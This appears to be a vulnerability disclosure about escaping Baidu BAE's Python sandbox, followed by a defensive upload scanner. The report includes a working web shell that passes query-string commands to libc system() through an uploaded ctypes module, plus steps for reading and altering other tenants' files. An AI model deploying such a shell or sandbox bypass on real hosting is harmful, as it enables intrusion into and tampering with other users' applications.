The Baidu BAE environment restricts important functions improperly; the restriction can be broken through to execute system commands and to read and write the program files of many other users on the server.
The problem lies in the Python environment of BAE: the restrictions on modules and functions are inappropriate. For example, you can upload the ctypes module (it does not exist in the environment by default) and load a .so extension to execute system commands. First the shell (of course there must be a Python BAE application; this is its index.py):

```python
# -*- coding: UTF-8 -*-
import os
import ctypes  # the ctypes folder copied from a local python2.7 install and uploaded with the app


def app(environ, start_response):
    status = '200 OK'
    headers = [('content-type', 'text/html')]
    start_response(status, headers)
    cmd = environ['QUERY_STRING']
    cmd = cmd.replace('%20', ' ').replace('%3E', '>').replace('%3C', '<').replace('%27', "'").replace('%22', '"')
    l = ctypes.cdll.LoadLibrary('/lib64/libc.so.6')
    # *** is the application name
    l.system(cmd + " > /home/bae/instanceall/instance1/codefs/0.***.duapp.com/111.txt")
    content = ''
    for line in open("/home/bae/instanceall/instance1/codefs/0.***.duapp.com/111.txt"):
        content = content + line + "\n"
    return content


from bae.core.wsgi import WSGIApplication
application = WSGIApplication(app)
```

Of course, that is the final result of the analysis. The process was as follows:

1. In dir, os, subprocess and other modules, the methods that can execute commands have been stripped out. `import commands` gives "No module named commands".
2. Upload your local commands.py and import it. Executing a system command still fails, because commands is itself built on the os module. Although unsuccessful, this opened up the idea: a missing module only needs its file uploaded to become usable.
3. What about executing a .so extension? The ctypes module does not exist, so upload your local ctypes folder, import it and call cdll. After compiling a .so extension and uploading it, the program was interrupted and no result was returned; apparently the local build environment differs from BAE's.
4. What about a .so that is already on the BAE server? Loading /lib64/libc.so.6 and calling system succeeds, so the shell above works.
5. `ls /home/bae/instanceall/instance1/codefs` lists the applications of other users. Reading their file contents is trivial, and so is modifying them (tested by modifying a file of another user's PHP application: successful).
Solution:
Disable loading of .so extensions. I wonder whether a lower-level restriction method could be used? Many Python modules are written in Python itself, so at the Python level a restriction on modules or functions is easily bypassed by uploading the relevant files. I would be glad to hear the solution.
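As an added example that is not part of the original report, the following is a pre-deployment scan a platform could run over an uploaded app tree to flag exactly the bypass described above: a vendored ctypes or commands module, and calls to LoadLibrary, CDLL or system. The module and call lists are my assumptions, as is the sample index.py constructed below. It is itself a Python-level check, so it complements, rather than replaces, the lower-level restriction the report asks for.

```python
import ast

# Modules the report shows being re-introduced by upload, and the loader/exec
# calls used once they are present (assumed lists, extend as needed).
FLAGGED_MODULES = {"ctypes", "commands", "subprocess"}
FLAGGED_CALLS = {"LoadLibrary", "CDLL", "system"}


def scan_source(src):
    """Return sorted (line, reason) findings for one Python source string."""
    findings = []
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in FLAGGED_MODULES:
                    findings.append((node.lineno, "import " + alias.name))
        elif isinstance(node, ast.ImportFrom):
            if node.module and node.module.split(".")[0] in FLAGGED_MODULES:
                findings.append((node.lineno, "from " + node.module))
        elif isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute):
            if node.func.attr in FLAGGED_CALLS:
                findings.append((node.lineno, "call ." + node.func.attr))
    return sorted(findings)


def scan_upload(files):
    """files: dict of relative path -> source text. Flags a vendored copy of a
    blocked module by its path (ctypes/..., commands.py) and scans each .py."""
    findings = []
    for path, src in files.items():
        top = path.split("/")[0].split(".")[0]
        if top in FLAGGED_MODULES:
            findings.append((path, 0, "vendored module"))
        if path.endswith(".py"):
            for line, reason in scan_source(src):
                findings.append((path, line, reason))
    return sorted(findings)


# Constructed sample upload mirroring the shape of the report's shell.
SAMPLE_INDEX_PY = (
    "import os\n"
    "import ctypes\n"
    "\n"
    "def app(environ, start_response):\n"
    "    l = ctypes.cdll.LoadLibrary('/lib64/libc.so.6')\n"
    "    l.system(environ['QUERY_STRING'])\n"
    "    return ''\n"
)
SAMPLE_UPLOAD = {"index.py": SAMPLE_INDEX_PY, "ctypes/__init__.py": ""}

if __name__ == "__main__":
    for finding in scan_upload(SAMPLE_UPLOAD):
        print(finding)
```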